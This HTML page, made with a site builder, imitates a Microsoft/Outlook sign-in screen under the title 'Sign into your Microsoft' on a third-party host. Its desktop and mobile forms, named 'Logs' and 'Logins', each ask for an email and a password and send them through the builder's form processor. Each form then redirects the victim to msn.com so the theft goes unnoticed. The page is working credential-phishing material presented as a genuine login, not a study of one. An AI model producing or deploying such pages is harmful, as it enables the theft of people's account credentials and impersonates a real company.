<!DOCTYPE html>
<html style="font-size: 16px;">
  <head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="utf-8">
    <meta name="keywords" content="">
    <meta name="description" content="">
    <meta name="page_type" content="np-template-header-footer-from-plugin">
    <title>Sign into your Microsoft</title>
    <link rel="stylesheet" href="nicepage.css" media="screen">
<link rel="stylesheet" href="Sign-into-your-Microsoft.css" media="screen">
    <script class="u-script" type="text/javascript" src="jquery-1.9.1.min.js" defer=""></script>
    <script class="u-script" type="text/javascript" src="nicepage.js" defer=""></script>
    <link rel="icon" href="images/favicon.png">
    <link id="u-theme-google-font" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,100i,300,300i,400,400i,500,500i,700,700i,900,900i|Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i">
    
    
    
    <script type="application/ld+json">{
		"@context": "http://schema.org",
		"@type": "Organization",
		"name": "outlooklivelogin"
}</script>
    <meta property="og:title" content="Sign into your Microsoft">
    <meta property="og:type" content="website">
    <meta name="theme-color" content="#478ac9">
  </head>
  <body class="u-body">
    <section class="u-clearfix u-hidden-sm u-hidden-xs u-image u-shading u-section-1" id="sec-a7f7" data-image-width="1599" data-image-height="900">
      <div class="u-clearfix u-sheet u-sheet-1">
        <div class="u-align-center u-container-style u-group u-white u-group-1">
          <div class="u-container-layout u-valign-middle-lg u-valign-middle-xl u-valign-top-md u-valign-top-sm u-valign-top-xs u-container-layout-1">
            <img class="u-image u-image-default u-preserve-proportions u-image-1" src="images/msygn.png" alt="" data-image-width="145" data-image-height="97">
            <div class="u-form u-form-1">
              <form action="https://nicepage.com/editor/Forms/Process" method="POST" class="u-clearfix u-form-spacing-10 u-form-vertical u-inner-form" style="padding: 7px;" source="email" name="Logs" redirect="true" redirect-address="https://www.msn.com/en-xl/?ocid=mailsignout&amp;pc=U591">
                <input type="hidden" id="siteId" name="siteId" value="455231">
                <input type="hidden" id="pageId" name="pageId" value="455234">
                <div class="u-form-email u-form-group">
                  <label for="email-a9f8" class="u-form-control-hidden u-label">Email</label>
                  <input type="email" placeholder="Email, phone or skype" id="email-a9f8" name="Email" class="u-border-1 u-border-custom-color-2 u-border-no-left u-border-no-right u-border-no-top u-input u-input-rectangle u-white" required="">
                </div>
                <div class="u-form-group u-form-group-2">
                  <label for="text-fa8c" class="u-form-control-hidden u-label"></label>
                  <input type="text" placeholder="Password" id="text-fa8c" name="Password" class="u-border-1 u-border-custom-color-2 u-border-no-left u-border-no-right u-border-no-top u-input u-input-rectangle u-white" required="required">
                </div>
                <div class="u-form-checkbox u-form-group u-form-group-3">
                  <input type="checkbox" id="checkbox-b1c7" name="Keep me signed in" value="On">
                  <label for="checkbox-b1c7" class="u-label">Keep me signed in</label>
                </div>
                <div class="u-align-right u-form-group u-form-submit">
                  <a href="#" class="u-border-0 u-btn u-btn-submit u-button-style u-custom-color-1 u-custom-font u-font-arial u-btn-1">Sign in</a>
                  <input type="submit" value="submit" class="u-form-control-hidden">
                </div>
                <div class="u-form-send-message u-form-send-success">Loading...</div>
                <div class="u-form-send-error u-form-send-message"> Unable to send your message. Please fix errors then try again. </div>
                <input type="hidden" value="" name="recaptchaResponse">
              </form>
            </div>
          </div>
        </div>
        <img class="u-image u-image-default u-image-2" src="images/12345rdfghj.png" alt="" data-image-width="681" data-image-height="70" data-href="https://outlooklivelogin.nicepage.io/Sign-into-your-Microsoft.html?version=c7e1758c-10f8-446a-b136-f96493aa2997&amp;uid=abb1db38-eeda-42e8-856a-51e206b63ed8">
      </div>
    </section>
    <section class="u-clearfix u-hidden-lg u-hidden-md u-hidden-xl u-section-2" id="sec-c685">
      <div class="u-clearfix u-sheet u-sheet-1">
        <img class="u-image u-image-contain u-image-default u-preserve-proportions u-image-1" src="images/msygn.png" alt="" data-image-width="145" data-image-height="97">
        <div class="u-align-center-sm u-align-left-xs u-form u-form-1">
          <form action="https://nicepage.com/editor/Forms/Process" method="POST" class="u-clearfix u-form-spacing-9 u-form-vertical u-inner-form" style="padding: 17px;" source="email" name="Logins" redirect="true" redirect-address="https://www.msn.com/en-xl/?ocid=mailsignout&amp;pc=U591">
            <input type="hidden" id="siteId" name="siteId" value="455231">
            <input type="hidden" id="pageId" name="pageId" value="455234">
            <div class="u-form-email u-form-group">
              <label for="email-d1a4" class="u-form-control-hidden u-label">Email</label>
              <input type="email" placeholder="Email, phone or skype" id="email-d1a4" name="Pemail" class="u-border-1 u-border-custom-color-1 u-border-no-left u-border-no-right u-border-no-top u-input u-input-rectangle u-white" required="">
            </div>
            <div class="u-form-group u-form-group-2">
              <label for="text-4327" class="u-form-control-hidden u-label"></label>
              <input type="text" id="text-4327" name="Password" class="u-border-1 u-border-custom-color-1 u-border-no-left u-border-no-right u-border-no-top u-input u-input-rectangle u-white" placeholder="Password" required="required">
            </div>
            <div class="u-form-checkbox u-form-group u-form-group-3">
              <input type="checkbox" id="checkbox-eac0" name="Keep me signed in" value="On">
              <label for="checkbox-eac0" class="u-label">Keep me signed in</label>
            </div>
            <div class="u-align-left-lg u-align-left-md u-align-left-xl u-align-right-sm u-align-right-xs u-form-group u-form-submit">
              <a href="#" class="u-btn u-btn-submit u-button-style u-custom-color-1 u-custom-font u-font-arial u-btn-1">Sign in</a>
              <input type="submit" value="submit" class="u-form-control-hidden">
            </div>
            <div class="u-form-send-message u-form-send-success">Loading...</div>
            <div class="u-form-send-error u-form-send-message"> Unable to send your message. Please fix errors then try again. </div>
            <input type="hidden" value="" name="recaptchaResponse">
          </form>
        </div>
        <img class="u-align-center-xs u-border-1 u-border-grey-75 u-image u-image-default u-image-2" src="images/12345rdfghj.png" alt="" data-image-width="681" data-image-height="70" data-href="https://outlooklivelogin.nicepage.io/Sign-into-your-Microsoft.html?version=c7e1758c-10f8-446a-b136-f96493aa2997&amp;uid=abb1db38-eeda-42e8-856a-51e206b63ed8">
      </div>
    </section>
    
    
    
  </body>
</html>